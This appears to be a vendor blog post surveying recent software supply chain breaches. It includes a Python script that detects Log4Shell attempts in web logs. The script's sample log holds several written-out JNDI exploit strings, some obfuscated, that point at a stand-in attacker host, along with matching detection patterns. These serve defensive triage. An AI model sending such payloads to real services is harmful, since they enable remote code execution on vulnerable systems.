Remember when Bill Nighy famously sang in Love Actually that “Christmas is all around us“?
If Nighy were singing that song today – and if he were playing a cybersecurity expert rather than a washed-up pop artist – the lyrics might instead go, “Supply chain attacks are all around us.”
Supply chain cyber-attacks remain a severe and persistent challenge for businesses across the planet.
They pose a tremendous and longer-term threat – partly because many businesses remain so poorly prepared to detect this type of cyber risk, let alone manage it, and partly because software supply chain attacks keep occurring despite dogged efforts to stop them.
To prove the point, here’s a look at some of the most significant software supply chain breaches that have taken place over the past year or so. Some have received widespread coverage in the media, while others have remained out of the spotlight except within cybersecurity circles. But they all underline just how pervasive supply chain risks have become for businesses of all types and sizes.
The Log4j supply chain fiasco
For starters, take the Log4j vulnerability (CVE-2021-44228, widely known as Log4Shell), which observers have called the “biggest vulnerability in decades” and one that promises to “haunt the Internet for years.”
The vulnerability, reported privately to Apache in late November 2021 and disclosed publicly in December 2021, affects Log4j 2, an open-source logging library so widely used in Java-based software stacks that it threatens “millions” of applications across the Internet, at companies ranging from tech titans like Google and Microsoft, to humble SMBs, and everyone in between.
The vulnerability gives attackers remote code execution on applications that use a vulnerable Log4j. If the application logs a string the attacker controls (a User-Agent header, a username, a chat message), Log4j evaluates a ${jndi:...} lookup embedded in that string and loads attacker-supplied code from a server the attacker names. From there, attackers can pivot to the underlying servers and network, which makes Log4j essentially a wide-open door to businesses’ entire IT estates and a worst-case scenario when it comes to supply chain risk. The spread was pandemic-like: exploitation attempts were first observed on 9 December 2021, 40,000 attacks had been reported by 11 December, and more than 800,000 within 72 hours of the disclosure. One security vendor reported exploitation attempts against 48% of the corporate networks it monitors worldwide, staggering numbers that show how quickly attackers moved.
It’s hard to put a specific dollar figure on the Log4j vulnerability, mainly because it was disclosed so recently that it remains to be seen how quickly affected systems will be patched. But given the severity of the vulnerability and the vast number of businesses it impacts, it’s not unreasonable to imagine that enterprises that fail to address it quickly could collectively face billions of dollars in losses due to sensitive data exposure, operational disruptions, and compliance violations.
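Because the Log4Shell payload has to reach a vulnerable application through something it logs, one of the first checks a defender can run is to scan web-server logs for the JNDI lookup strings attackers send. The Python below is an added example for this article, not code from the original post or from the Log4j project. It normalizes the common obfuscations seen in the wild (URL encoding, ${lower:j}, ${::-j}, ${env:NOSUCHVAR:-j}) before matching, because a naive search for the literal text "jndi:" misses most of them. The log lines are constructed for the example and use documentation IP ranges; treating lookup prefixes case-insensitively is an assumption made for robustness.

```python
import re
import urllib.parse
from typing import List, Optional, Tuple

# One Log4j lookup with no nested lookup inside it, e.g. ${::-j} or ${lower:J}.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What remains once obfuscation has been stripped away: jndi:<scheme>://
_JNDI = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Evaluate the lookup types attackers use purely to hide the text 'jndi'."""
    low = body.lower()  # assumption: treat lookup prefixes case-insensitively
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    # ${anything:-default} evaluates to the default when the lookup is undefined;
    # this covers ${::-j}, ${env:NOSUCHVAR:-j} and ${sys:nope:-j}.
    if ":-" in body:
        return body.split(":-", 1)[1]
    # Anything else (including the jndi lookup itself) stays in place so the
    # final scan can see it.
    return "${" + body + "}"


def normalize(text: str) -> str:
    """Undo (double) URL encoding, then collapse nested lookups innermost-first."""
    text = urllib.parse.unquote(urllib.parse.unquote(text))
    for _ in range(32):  # real payloads nest a handful of levels; bound the work
        resolved = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi(text: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, rmi, dns, ...) found in text, or None."""
    m = _JNDI.search(normalize(text))
    return m.group(1).lower() if m else None


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((n, scheme))
    return hits


# Constructed Apache-style access log lines: one benign, three exploitation
# attempts with increasing obfuscation, and one benign line that merely mentions
# "jndi" in a URL path (must not be flagged).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 77 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7/c}"',
    '10.0.0.3 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, scheme in scan_lines(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup via {scheme} -> {normalize(SAMPLE_LOG[lineno - 1])}")
```

A hit tells you that someone tried, not that the attempt succeeded; the follow-up is to check whether the host named in the lookup was actually contacted (outbound LDAP/RMI/DNS from the application server) and whether the application was running a vulnerable Log4j 2 at the time. Lookups hidden inside encodings the normalizer does not undo (for example ${date:'j'} or Unicode escapes) will still slip past it, so treat this as a triage aid rather than a complete control.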
The SolarWinds breach
Probably the second most famous supply chain breach in recent history targeted customers of SolarWinds, whose Orion network monitoring software was compromised. By inserting malicious code into Orion’s build process, so that a backdoor shipped inside legitimately signed software updates, attackers gave themselves a way into the private networks of as many as 18,000 government agencies and private companies that installed the tainted updates.
The attack has already cost SolarWinds itself about $18 million in response costs. It’s unclear what the financial losses look like for the businesses affected by the breach. Still, as with Log4j, the economic fallout could be steep for organizations that suffer data leakage and IT disruptions by failing to address the risk quickly.
What’s especially noteworthy about the SolarWinds breach (beyond the high-profile targets it compromised) is that the attack reportedly began in early 2019 but wasn’t disclosed publicly until December 2020. It’s an example of a supply chain attack wherein hackers had access to a private environment for well over a year before any victims even knew it was happening.
The Kaseya supply chain breach
A similar supply chain crisis befell users of Kaseya VSA, a remote monitoring and management platform used by thousands of Managed Service Providers (MSPs) and other IT businesses.
In the Kaseya attack of July 2021, threat actors exploited vulnerabilities in Kaseya’s VSA server to push REvil ransomware, through the platform’s own management channel, into the environments that MSPs managed with it. As a result, the compromise of a single platform reportedly put more than 1,500 downstream companies at risk.
That’s a small figure compared to some of the other major supply chain breaches of the past year. But it’s still stunning when you realize that the compromise of a single software platform gave attackers access to the networks and data of well over a thousand organizations.
The Panasonic breach leaks customer data
Panasonic disclosed in November 2021 that one of its file servers had been accessed by an unauthorized third party. The intrusion had been active for months before it was discovered.
Although Panasonic was initially tight-lipped about which data the attackers reached, subsequent reports state that customer information was exposed. It remains unclear exactly how many customers were affected or what their financial losses might be; what we do know is that by breaching a single server at a major vendor, attackers were able to compromise sensitive information belonging to a large number of businesses.
In that sense, the Panasonic breach represents a different kind of supply chain attack: one that compromises the data businesses share with each other as part of supply chain operations. It’s a reminder that it’s not just your software vendors who can create security risk within your supply chain, but any business with whom you share sensitive internal data.
The GoDaddy breach of 2021
In a similar incident, GoDaddy, the widely used hosting company, announced in November 2021 that a breach of its Managed WordPress environment had exposed data belonging to up to 1.2 million customers.
Especially notable about this incident is that it wasn’t just records like customer email addresses that leaked. Original WordPress admin passwords, sFTP and database credentials, and for some customers SSL private keys were also reportedly exposed, giving anyone holding them a way into the affected customers’ sites and databases rather than merely their contact details.
In that respect, this data breach was just as dangerous as a software compromise like SolarWinds or a vulnerability like Log4j, which gave attackers remote access to the environments of companies that use those platforms.
The Accellion breach
Accellion is well known for secure file sharing and collaboration software. In December 2020, Accellion’s legacy File Transfer Appliance (FTA) was hit with a zero-day exploit. Accellion shipped a patch shortly afterwards, but that was not enough: in the following month threat actors targeted FTA again, chaining additional zero-day vulnerabilities and planting a new web shell on compromised appliances. Further patches followed.
The breach had devastating consequences, affecting around 300 FTA customers worldwide. Reports attribute the intrusions to a threat group tracked as UNC2546, and victims subsequently received extortion emails threatening to publish their stolen data.
Organizations caught in the ripple effect included Shell, the University of California system, the Australian Securities and Investments Commission, and the Reserve Bank of New Zealand.
Sadly, the breach exposed millions of individuals’ sensitive data, including ID numbers, credit card information, and banking details.
A class-action lawsuit filed on behalf of affected individuals alleged that Accellion failed to secure its FTA platform and to implement sufficient safeguards for its customers’ sensitive information.
According to a Reuters report, Accellion agreed to pay $8.1 million to settle the litigation over the breach.
The HP printer vulnerability
You may not think of your printer as a significant cybersecurity risk. But if you own one of the more than 150 HP multifunction printer models affected by a major vulnerability disclosed in late 2021, it’s time to think again.
The vulnerability is a buffer overflow in the printer’s firmware, which attackers can use to execute code of their choosing on the device remotely. Although that code runs on a printer rather than a computer or server, most printers sit on the corporate network, so a compromised printer can serve as a beachhead from which attackers move against other devices on the same network.
There are no reports of significant attacks exploiting the HP printer vulnerability. Still, it’s not hard to imagine attackers using such a foothold as the first step of a ransomware attack against businesses that use the affected printers.
The Nvidia hack
Nvidia, a leading manufacturer of graphics processing units (GPUs), was one of the highest-profile companies to suffer a large-scale breach in 2022.
The attack, which a hacking group called Lapsus$ claims to have carried out, led to the leak of around 1 terabyte of sensitive data. Nvidia has not given a complete account of what was taken, but it included proprietary source code and employee credentials, and Lapsus$ has already posted some of the stolen data online.
While it’s difficult to put a monetary figure on the cost of the attack without more details about exactly which data was lost, it’s safe to say that the financial impact was substantial. The breach harmed Nvidia’s reputation, and the exposure of sensitive source code could help Nvidia’s competitors learn how some of its most profitable products work, which is not a good thing from a business perspective. The leak also reportedly included expired Nvidia code-signing certificates that were subsequently used to sign malware, a direct supply chain consequence for anyone who trusts code because it carries the vendor’s signature.
The Okta breach
Lapsus$ has also been busy this spring posting sensitive information it claims to have stolen from Okta, an identity and access management provider used by thousands of organizations worldwide.
The attack happened not because hackers expertly exploited a software vulnerability but because they obtained remote access to a support engineer’s workstation at a third-party contractor Okta used for customer support. (Lapsus$ later claimed the device was a thin client rather than a laptop. Either way, it’s clear that compromising a single support device gave the hackers access to Okta’s customer-support tooling, which is itself a path into customer tenants.)
Given that Okta is in the business of preventing unauthorized access to applications and infrastructure, this attack is a little ironic. It’s also a reminder of why companies should take measures, like enforcing multi-factor authentication and limiting what a single support account or device can reach, to ensure that the compromise of one device can’t turn into a large-scale supply chain security threat.
Staying ahead of supply chain attacks
Incidents like those described above are reminders that supply chain attacks are all around us. If your business hasn’t been affected yet, you’re probably just lucky.
But the good news is that there are practical steps you can take to minimize your risk of suffering software supply chain breaches. Start by vetting that your vendors and partners adhere to solid cybersecurity standards. You may also consider enforcing compliance requirements across your supply chain network. And remember to educate your security team on managing the particular risks associated with supply chain threats.
Schedule a demo to learn how Findings can help automate supply chain risk management.